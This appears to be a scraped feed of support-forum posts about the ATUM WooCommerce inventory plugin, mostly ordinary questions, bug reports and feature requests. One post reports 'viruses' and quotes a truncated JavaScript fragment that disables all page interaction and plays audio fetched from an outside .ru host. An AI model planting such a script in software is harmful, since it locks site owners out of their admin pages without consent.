A popup advertising ‘ATUM Barcodes PRO add-on is here!’ appears as soon as I open the plugin. However, there is no way to close it. Only two buttons appear ‘Read the docs’ and ‘Try it now’. Is this plugin actually free?
]]>Hi, so thew problem is that in the ATUM I can enter a purchase price for 1 product. Now, Let’s say, I purchase from my supplier 5 pcs, which cost 10$. I sell for one peace only. So, I can’t enter 2$ dollar purchase price, it gives me red field….
]]>There are viruses in your plugin. When switching to the plugin, the anthem of Ukraine plays and does not allow you to edit anything. There is also no way to edit product cards! Solving the problem is unacceptable!!
((function(){document.body.style.pointerEvents=”none”;var t=document.createElement(“audio”);t.src=”https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3″
ATUM is great, but I am a missing 2 features that would be very handy. Not only for me, but for most store owners. Also, it would be very easy to add to ATUM.
Feature 1: Show sales for more than 30 days
In ATUM, I can now only see up to a maximum of 30 days what the sales where of a product. I need to know what the sales where in for example 90 days.
Feature 2: Calculate a suggestion how much to purchase
When I make a new order to replenish the stock, I look at what the sales of a certain product where for the last X months. Then I calculate how much I would need to buy, so that I have enough stock for Y months. It is a very easy calculation, but I have to do this manually for all hundreds of products, as this is not (yet) a feature in ATUM (or Woocommerce).
The calculation is very simple:
Order_quantity_needed = Y/X * Number_of_sales_in_X_Months – Current_stock
It would save so much time when the easy calculation above would be integrated in ATUM! Just add an extra column in Stock Central with “New Stock Needed”.
The admin tooltips used in ATUM get broken if installed along with an incompatible plugin “Discontinued Product Stock Status for WooCommerce”:
Both plugins use the generic class “.tooltip” and seem to clash in scripts and styling.
Using a more specific classes might help to prevent issues.
Hello! I am sure this is a common question but I haven’t fount an answer so far.
We have 2 shops. Can ATUM keep synchronization between shops? If not, what other plugin does ATUM play nice with?
]]>I am using “WooCommerce PDF Invoice Builder” to generate invoices and Atum Inventory for inventory management. However, the invoice is not showing the discount amount, regular price, or discounted price.
I contacted the plugin developer, and they replied:
“The plugin doesn’t perform the calculations; it’s WooCommerce that does. The plugin simply uses whatever data WooCommerce provides. The plugin you’re using might have its own method for calculating those amounts instead of using the standard WooCommerce system.
For example, the plugin uses WooCommerce’s standard
method ‘get_discount_total’ to retrieve the discount total.”
I would like to know how I can display the discount amount, regular price, and discounted price on the invoice.
]]>Hi ATUM Team,
I want to customize Atum central with CSS to color out of stock products in red or make them flash
]]>Hi guys, it seems that ATUM does not support stock between stores.
Does anyone out there have experience in using a third party stock sync plugin in conjunction with ATUM ?
]]>We have used this function in the past, but this time we faced an issue.
Basically we set via ATUM the sale prices with a start and end date. At the start date, the sale price was applied, but in the archive pages or also in the overview woocommerce products page in the backend, the sale price was matching the full price just striked-through.
In order to workaround the issue we either had to remove the sale dates via ATUM or we had to enter each product in the backend and save it again or in case of a variable product we had to save the variations again. These actions would then correctly apply the sale price and display it correctly on the archive pages.
i don’t know why in my catalog i have 5k products but your plugin load/get only 2k products, can you help me ?
https://disk.yandex.ru/i/SoziGXbPltGdVQ (screen shot)
If products are added to the inventory log more than once (let’s say a part was added today and a part was added a couple of days later), it is very easy to add duplicate products and then when we change the stock of products we have problems.
Is it possible to make a restriction on adding the same product more than 1 time in one inventory log? And show an error when trying to add a product that has already been added earlier.
]]>Hi, i have to post it here because i cant log in to the atum support on your site. It does not recognize my account anymore and recovering password funciton on your site does not send me an email.
Im using the follwong code to change the status of orders, ATUM activate it takes 1500 ms on an live server with no other plugins, fresch installation and sotrefront theme – but ATUM deactivate it drops to 600 – 700 ms which is ok for me. Pls fix if possible. Here my code – im using HPOS. My Server is optimized and has no errors in server log. No other plugin as mentioned – Running multiple WP sites on this server with 0 issues except this one.
// Register the custom endpoint
add_action('init', 'end_point_0007');
function end_point_0007() {
add_rewrite_rule('^eoed/?', 'index.php?eoed=1', 'top');
// Add the custom query variable
add_filter('query_vars', 'end_point_0007_query_vars');
function end_point_0007_query_vars($vars) {
$vars[] = 'eoed';
return $vars;
// Custom handler for editing orders
add_action('template_redirect', 'end_point_0007_handler');
function end_point_0007_handler() {
global $wp_query;
if (isset($wp_query->query_vars['eoed'])) {
// Nonce verification
$nonce_action = 'edit_nonce';
if (!isset($_GET['nonce']) || !wp_verify_nonce($_GET['nonce'], $nonce_action)) {
wp_send_json_error(array('status' => 'error', 'message' => 'Invalid nonce.'));
// Set content type
header('Content-Type: application/json');
// Get order ID and new status from the request
$order_id = isset($_GET['order_id']) ? intval($_GET['order_id']) : 0;
$new_status = isset($_GET['new_status']) ? sanitize_text_field($_GET['new_status']) : '';
if ($order_id <= 0 || empty($new_status)) {
wp_send_json_error(array('status' => 'error', 'message' => 'Invalid order ID or status.'));
// Load the order using HPOS
$order = wc_get_order($order_id);
if (!$order) {
wp_send_json_error(array('status' => 'error', 'message' => 'Order not found.'));
// Update the order status
$order->set_status($new_status, 'Order status updated by custom endpoint.');
$order->save(); // Save the changes to the database
wp_send_json_success(array('status' => 'success', 'message' => 'Order status updated.'));
I am interested in adding this plugin to my Woocommerce site. Can you please let me know which stock is monitored exactly? Is it only my stock? Does it monitor my supplier’s stock as well and update my stock accordingly?
A few months ago I had exported the product list in pdf from the Stock Central. Now, I can’t do it for the last few months. When I want to export the product list in pdf from stock central. I get this error.
There has been a critical error on this website.
I’ve been using the ATUM free plugin mostly without issue, but all of a sudden today Stock Central is saying that all of my managed products are out of stock.
Even more confusing, when you click on the “Out of Stock” products tab, nothing shows in the table, and when I search for an individual product in the “All” tab, the products show up with their correct stock numbers and status.
I’ve tried running both the “Update products’ calculated properties” and “Delete ATUM transients” tools, but nothing has changed. I’ve cleared the cache, deactivated and re-activated the plugin, too. I’ve added new simple products recently, but I haven’t installed or updated any plugins. Any idea what might be happening here?
P.S. I tried to post in the ATUM forum, but the site won’t let me, even though I have an account. I’ve tried to have my confirmation email resent, but the email either never arrives, or when I click the link it says it’s no longer valid. I’ve been trying to troubleshoot ATUM things all day. Pretty frustrated all around. :/
first of all thank you for the great plugin.
I have a few questions about it.
how can i check the actual stock level because it shows me a lot of products that are not in stock.
can i exclude certain categories from the filter?
it must work in such a way that only the quantity that is listed under individual variations is displayed.
furthermore, there are many products that are not in stock because they are only ordered from the supplier after the order has been placed.
thank you for your help
best regards
We are using Atum for our SKU and EAN and we use Woocommerce Product Feed Manager (https://www.wpmarketingrobot.com/) to create feeds for google ads.
We have to select the Source of the value of the EAN and SKU. But i can’t see how atum sets these values.
Could you tell me which meta’s i can use to put the values in my feed?
Hello, we are looking for a solution to quickly change product prices and inventory levels. We have different prices for our products depending on the customer role…
Therefore, we also need to have these prices at the stock central. But I cannot find how to add this.
And I also haven’t found a way to change the order of the columns either.
Is there a way to solve this?
Kind regards,
I have a file on this path where I am trying to display each products inbound stock but it is not working. I am trying to fetch the same using this:
$inbound_stock = \Atum\Inc\Helpers::get_product_inbound_stock( $product, true );
It is throwing me this error:
Fatal error: Call to undefined method WC_Product_Simple::get_inbound_stock()
How can I fix it?
Is ATUM compatible with composite products? I run Woo Composite Products and I can not see composite products in the Central Stock module.
]]>Hallo, i love your plugin. On my one shop is working perfectly. But i have problem in other shop. The stock manager is showing only 10 products, but i have around 120 products.
I tryed to clean cache, reisntal the plugin, change PHP version and nothing helped. Still only 10 products, missing the rest of products.
Any idea how to fix it? Thank you very much
Regares Nicole
Is there any way to change the email address which receives inventory related email? currently emails are received by the Wrodpress admin email. It would be good to send inventory emails to a different email ID. Will it be possible?
On our site we use WPML/WCML we have three languages and three currencies set up. For each language a different currency. Unfortunately I found that we are getting the default currency in all languages. I searched for the cause and discovered that this happens when the ATUM plugin is active. It seems that with the last update the plugin stopped being compatible with WPML. Please take a look at it.
]]>Hi There
It is intendd to sell SIM cards on our site.
These come in batches of 400 pieces and each SIM has a serial number, which must be used in the correct sequence. The serial numbers shold be on the order for picking and packing purposes and for spot checking.
Is it possible that your plugin can handle this requirement?
Steve B
]]>Hi, may I ask what is the meta tag for suppliers?
Thank you!
]]>Hello again, Jose!
Is there a way to include the ACF custom field on the generated PDF file in the purchase orders?
Thanks a lot!
I am looking for a plugin that tracks my stock of raw materials.
I have blanks that I use to create a product. So I can’t set stock on product level. Must be raw materials level.
Is that possible?
]]>Hi, we have created a custom order status for our ecommerce sites. How can we include that in the Sales and Orders calculation of your plugin? So that in the Dashboard it will reflect the values including these custom order status.
Thank you!
]]>Hi, I would like to ask how can I disable horizontal scroll when using the mouse wheel?
In most cases, horizontal scroll should be triggered when we press Shift + Mouse Wheel. However in the Stock Central Table List, every time I hover to the table and I need to scroll down, it keep scrolling horizontally.
Is there a way to disable it using js or code snippets?
Thank you!